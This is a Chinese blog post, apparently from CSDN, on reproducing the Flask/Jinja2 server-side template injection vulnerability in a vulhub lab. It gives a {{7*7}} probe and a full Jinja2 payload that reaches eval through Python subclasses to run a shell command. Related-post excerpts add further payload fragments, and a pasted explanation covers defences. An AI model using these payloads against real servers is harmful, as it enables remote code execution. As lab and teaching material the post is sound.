Flask(Jinja2) 服务端模板注入漏洞(SSTI)

已于 2023-11-06 18:29:29 修改
阅读量566 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 信息安全 文章标签: flask python 网络安全 信息安全 web安全
于 2023-11-06 18:28:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_52920608/article/details/134252206
文章讨论了Flask应用中使用Jinja2时出现的服务端模板注入(SSTI)漏洞,通过vulhub提供的payload实例展示了如何利用该漏洞执行代码。作者提醒了安全防范措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html
验证漏洞存在 ?name={{7*7}}
回显49说明漏洞存在
在这里插入图片描述

vulhub给出的payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述

Flask服务端模板(Jinja2)注入漏洞SSTI)复现
afei001
12-29 309
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 (1)环境搭建 (2漏洞利用 5.漏洞原理 (1)分析payload (2)分析源码 6.修复建议 1.漏洞概述 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式。 2.影响范围 ...
Flask jinja2 SSTI 服务端模板注入
qq_57172130的博客
05-03 541
Flask jinja2 SSTI 服务端模板注入 jinja2模板引擎介绍 jinja2:是 Python 下一个被广泛应用的模板引擎,是由Python实现的模板语言,他的设计思想来源于 Django 的模板引擎,并扩展了其语法和一系列强大的功能,其是Flask内置的模板语言。 模板语言:是一种被设计来自动生成文档的简单文本格式,在模板语言中,一般都会把一些变量传给模板,替换模板的特定位置上预先定义好的占位变量名。 注入原理 环境搭建 漏洞复现 ...
FlaskJinja2服务端模板注入漏洞
luvlettercl的博客
05-14 932
Flask是一个web框架,提供工具、库、技术来允许用户创建一个web应用程序,不依赖外部框架。 Jinja2python中被广泛应用的模块引擎,由python实现的模块语言,Flask提供render_template函数封装了该模块引擎。 漏洞复现: 手工复现: 开启环境:docker-compose up -d 访问:http://192.168.0.27:8000 payload:url/?name={{3*3}} 出现 9 即代表SSTI漏洞存在 漏洞利用: ur..
FlaskJinja2服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 2043
整理一下Flask框架下的SSTI漏洞相关知识
FlaskJinja2服务端模板注入漏洞复现
玄道的网安博客
01-17 768
简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2漏洞概述 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 环境搭建 这里使用vulhub进行搭建 地址: https://github.com/vulhub/vulhub/tree/master/flask/ssti 进入目录并编译运行测试环境 cd vu...
漏洞靶场】--Flask(Jinja2) 服务端模板注入漏洞
hello word的博客
01-06 3259
漏洞环境 SSTI 访问?name=1,触发ssti漏洞。 payload {%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__c
Flask服务端模板(Jinja2) SSTI 注入漏洞
weixin_51387754的博客
11-22 1524
漏洞简介 flask/ssti漏洞,即: FlaskJinja2服务端模板注入漏洞(SSTI)Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Fla
Flask (Jinja2) 服务端模板注入漏洞复现
来日可期的博客
10-15 1421
模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 `{{}}`),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中
Flask(Jinja2)服务端模板注入 漏洞复现
Senimo
05-03 2236
FlaskJinja2服务端模板注入漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 模版引擎被 Web 应用程序广泛用于呈现动态数据。不安全的模版语法可以嵌入用户输入实现服务器端的模版注入,这是一个经常出现的严重漏洞。模版注入可以直接攻击 Web 服务器内部结构,并获取到远程代码执行权限(RCE)。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在服务器上搭建: cd /vulhub/flask/ssti docke
WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 8693
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 FlaskJinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 FlaskJinja2介绍: 1.Flask是一个轻量级的基于Pythonweb框架。 2.Jinja 模板只是一个属于.
SSTI模板注入漏洞基础
2301_80913334的博客
06-07 1058
良好的文档、丰富的插件、包含开发服务器和调试器、集成支持单元测试、RESTful请求调度、支持安全cookies、基于Unicode。
Web安全基础学习:SSTI模板注入漏洞JINJA2模板注入
qq_51862722的博客
06-24 1354
SSTI服务端模板注入攻击,它主要是由于框架的不规范使用而导致的。主要为python的一些框架,如 jinja2 mako tornado django flask、PHP框架smarty twig thinkphp、java框架jade velocity spring等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。
利用Vulnhub复现漏洞 - FlaskJinja2服务端模板注入漏洞
JiangBuLiu的博客
07-08 1183
FlaskJinja2服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/flask/ssti/ 漏洞原理 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...
FlaskJinja2服务端漏洞
weixin_59872639的博客
03-18 812
先来看一下代码: 在浏览器中输入 http://your-ip:8000/?name=aaa 会出现 hello aaa 在name后面也可以输入其他东西,比如: http://192.168.147.139:8000/?name={{123*123}} http://your-ip/?name={{'aaa'.upper()}} 任意命令执行的方法,需要在python里要执行系统命令需要import os模块。 想要在模板中直接调用内置模块 os,即需要在模板环.
Jinja2 模板注入&模板内命令执行
3569
03-13 2287
原因:        ichunqiu 的web中有一个 Musee de X ,知道 http:// 文件能获取,但是没有想到 file:// 获取文件,根据报错也没有想过他用的是 jinja2。后来朋友说payload每个环境可能不太一样,就自己尝试了一波。分析:      这是 python2 运行的,结果就是输出 whoami 的信息#code:utf-8 from jinja2 imp...
ssti模板注入
最新发布
03-14
<think>好的,我现在需要处理用户关于SSTI(服务器端模板注入漏洞的查询。用户想了解其原理及防御措施。首先,我要确保自己正确理解SSTI的基本概念。 根据引用[5],SSTI漏洞是因为服务端接收了用户的恶意输入后,未经处理就作为模板内容的一部分,导致模板引擎编译时执行了恶意代码。这点是关键,需要解释清楚。接下来,我需要说明原理,可能分步骤:用户输入被嵌入模板模板引擎处理时解析了恶意代码,导致攻击。例如,用户输入`{{7*7}}`如果返回49,说明存在漏洞。 然后,防御措施部分需要结合多个引用。引用[1]提到不要让用户控制模板内容,使用正规的渲染方法。引用[3]建议限制模板的访问权限,引用[2]提到输入验证、白名单过滤等。引用[5]提到不同语言的常见模板引擎,可能需要具体说明防御措施适用于这些引擎。 需要注意用户要求回答结构清晰,分点说明。可能先讲原理,再讲防御,每个部分用条目列出。同时,确保使用正确的中文术语,避免技术术语错误。 可能的问题点:是否遗漏了某些防御措施?比如引用[4]提到的靶场练习,虽然重要,但可能属于实践部分,不是直接的防御措施。需要确认是否需要包含。 另外,用户提供的引用中有重复的内容,需要整合。例如,输入验证、白名单、限制访问、使用安全模板方法等。需要将这些综合起来,分点说明。 最后,生成相关问题,需围绕SSTI漏洞,比如不同引擎的利用方式、检测方法、案例等。确保问题相关且有助于用户进一步学习。 总结步骤:1. 解释SSTI原理,2. 详细说明防御措施,3. 生成相关问题。需要引用正确的来源,并在回答末尾添加引用标识。</think>### SSTI(服务器端模板注入漏洞原理及防御措施 #### **一、原理** 1. **漏洞成因** SSTI漏洞是由于服务端将用户的恶意输入直接嵌入模板中,未经处理即由模板引擎解析执行。例如,用户输入如`{{7*7}}`,若返回`49`则表明模板引擎执行了该表达式,漏洞存在[^5]。 $$ \text{恶意代码} \rightarrow \text{模板引擎解析} \rightarrow \text{执行危险操作} $$ 2. **攻击流程** - 攻击者通过参数、表单等提交包含模板语法的恶意输入(如`{{config}}`)。 - 服务端错误地将输入拼接到模板中,模板引擎将其视为合法代码编译执行。 - 攻击者可读取敏感数据(如数据库密码)、执行系统命令,甚至控制服务器[^2][^5]。 3. **影响范围** 漏洞危害程度取决于模板引擎的功能复杂度。例如: - **PythonJinja2)**:可通过`{{''.__class__.__mro__}}`访问类方法。 - **PHP(Twig)**:可能利用`{{_self.env.registerUndefinedFilterCallback("exec")}}`执行命令。 --- #### **二、防御措施** 1. **输入过滤与验证** - 对用户输入进行**严格白名单过滤**,禁止包含模板语法字符(如`$`、`{{}}`)。 - 使用正则表达式检测危险符号,例如匹配`\{\{.*\}\}`并拦截[^2]。 2. **安全模板渲染方法** - 避免直接拼接用户输入到模板,改用**上下文变量传递**。例如在Flask中: ```python return render_template("index.html", content=user_input) # 安全:变量通过上下文传递 ``` 而非`render_template_string(user_input)`[^1][^5]。 3. **最小化模板引擎权限** - 禁用模板引擎的危险功能,如Jinja2的`{% debug %}`或访问内置对象(如`__builtins__`)。 - 配置模板沙箱环境,限制文件读写和系统调用[^4]。 4. **访问控制与审计** - **限制模板文件修改权限**,仅允许管理员或可信用户操作[^3]。 - 定期进行**安全审计**,检查模板渲染逻辑是否存在注入风险。 5. **框架与组件更新** - 及时升级模板引擎版本,修复已知漏洞(如Jinja2旧版本的沙箱逃逸问题)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XXX_WXY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值